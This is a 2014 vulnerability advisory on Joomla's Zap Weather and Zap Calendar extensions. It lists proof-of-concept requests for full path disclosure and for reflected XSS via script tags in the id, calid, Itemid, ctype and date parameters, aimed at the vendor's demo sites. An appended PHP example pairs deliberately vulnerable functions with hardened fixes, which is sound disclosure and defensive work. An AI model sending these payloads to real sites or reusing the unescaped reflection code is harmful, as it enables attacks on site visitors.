Joomla Zap Weather FPD & Zap Calendar XSS

2014.01.21
Credit: Smash_
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#Title - Joomla Zap Weather FPD & Zap Calendar XSS
#Date: 01.21.2014
#Vendor: zcontent.net ( extensions.joomla.org/extensions/owner/cogliano )
#Versions - Z Weather v9 & Zap Calendar v4.0 (Latest ATM)
#Contact: smash[at]devilteam.pl

#Zap Weather
PoC - zcontent.net/demo/zapweather

1. Full Path Disclosure

Request:
zcontent.net/demo/zapweather?view=location&id[]=5layout=alert&tmpl=component
OR
http://zcontent.net/demo/zapweather?view=location&id=-666&layout=alert&tmpl=component

Error appears:
Error
Failed loading XML file
Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315
Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315
Warning: Invalid argument supplied for foreach() in /var/www/zcontent/components/com_zweather/views/location/view.html.php on line 324

#Zap Calendar

1. Cross Site Scripting at Events

- Itemid
GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1&Itemid=118"><script>alert(666)</script>&tmpl=component HTTP/1.1
Host: www.zapcalendar.com

- Calid
GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1"><script>alert(666)</script>&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com

- Id
GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196"><script>alert(666)</script>&calid=1&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com

2. Cross Site Scripting at Calendar

- Itemid
Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118"><script>alert(666)</script>&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01&limitstart=0

- Ctype
Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m"><script>alert(666)</script>&ajax=1&format=raw&date=2014-05-01&limitstart=0

- Date
Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01"><script>alert(666)</script>&limitstart=0
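The two defect classes the advisory reports, as an added example that is not part of the advisory or of the Zap extensions' own code: a PHP sketch of an untyped `id` lookup that ends in the path-disclosing foreach() warning, beside a type-checked version, and an unescaped parameter reflection into an href, beside an input-typed and output-escaped version. The parameter names (id, calid, Itemid) come from the PoC requests; the function names and the in-memory lookup table are constructed for the demonstration. In a real Joomla component the typed read would go through the framework's input layer rather than a bare request array, and the second half of the fix is the php.ini side: display_errors=Off so a residual notice reaches the log, not the visitor.

```php
<?php
// Added example, not code from the advisory or from the Zap extensions. It models
// the two defect classes the advisory reports against an illustrative request
// array ($_GET in a real component), using the parameter names from the PoC
// requests (id, calid, Itemid). The lookup table and function names are
// constructed for the demonstration.

// Stand-in for a database call: returns matching rows, or false when none match,
// which is the return shape that makes the untyped foreach() below warn.
function fakeDbRows($id)
{
    $table = [5 => [['name' => 'Warsaw']], 196 => [['name' => 'Demo event']]];
    if (!is_scalar($id) || !isset($table[(int) $id])) {
        return false;
    }
    return $table[(int) $id];
}

// --- 1. Full Path Disclosure --------------------------------------------------
// id[]=5 makes $get['id'] an array and id=-666 matches nothing; either way the
// lookup returns false and foreach() emits a warning that, with display_errors on,
// prints the script's absolute path into the response (the advisory's "/var/www/..").
function vulnerableLookup(array $get): array
{
    $rows = fakeDbRows($get['id']);   // no type check on the parameter
    $out = [];
    foreach ($rows as $row) {         // Warning: Invalid argument supplied for foreach()
        $out[] = $row['name'];
    }
    return $out;
}

function hardenedLookup(array $get): array
{
    // Validate the type first: arrays, negatives and text all fail FILTER_VALIDATE_INT.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];                    // controlled "not found"; no PHP warning reaches the page
    }
    $rows = fakeDbRows($id);
    return is_array($rows) ? array_column($rows, 'name') : [];
}
// Independently of the code fix, production php.ini keeps display_errors=Off and
// log_errors=On, so a residual notice goes to the log instead of the visitor.

// --- 2. Reflected XSS ----------------------------------------------------------
// The three parameters are concatenated into an href attribute; a value such as
// 118"><script>alert(666)</script> closes the attribute and injects markup.
function vulnerableEventLink(array $get): string
{
    return '<a href="index.php?option=com_zcalendar&view=event&id=' . $get['id']
         . '&calid=' . $get['calid'] . '&Itemid=' . $get['Itemid'] . '">Event</a>';
}

function hardenedEventLink(array $get): string
{
    // Type-restrict on input (these are all integers in the component), then
    // escape on output so even a value that slips through cannot break the attribute.
    $ints = [];
    foreach (['id', 'calid', 'Itemid'] as $k) {
        $v = filter_var($get[$k] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        $ints[$k] = ($v === false) ? 0 : $v;
    }
    $qs = http_build_query(['option' => 'com_zcalendar', 'view' => 'event'] + $ints);
    return '<a href="index.php?' . htmlspecialchars($qs, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">Event</a>';
}

// Demonstration with the advisory's Itemid payload and the array-injected id.
$req = ['id' => '196', 'calid' => '1', 'Itemid' => '118"><script>alert(666)</script>'];

assert(strpos(vulnerableEventLink($req), '<script>') !== false);   // payload reflected intact
assert(strpos(hardenedEventLink($req), '<script>') === false);     // Itemid rejected, output escaped
assert(hardenedLookup(['id' => ['5']]) === []);                    // id[]=5 rejected, no warning
assert(hardenedLookup(['id' => '-666']) === []);                   // negative id rejected
assert(hardenedLookup(['id' => '5']) === ['Warsaw']);              // well-formed id still works
echo hardenedEventLink($req), "\n";
```

The order of the two controls matters: the integer filter is what stops the array and negative cases that trigger the warning, and `htmlspecialchars` on output is what keeps a reflected parameter inside its attribute even where a filter is missed, so a component needs both rather than either alone.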
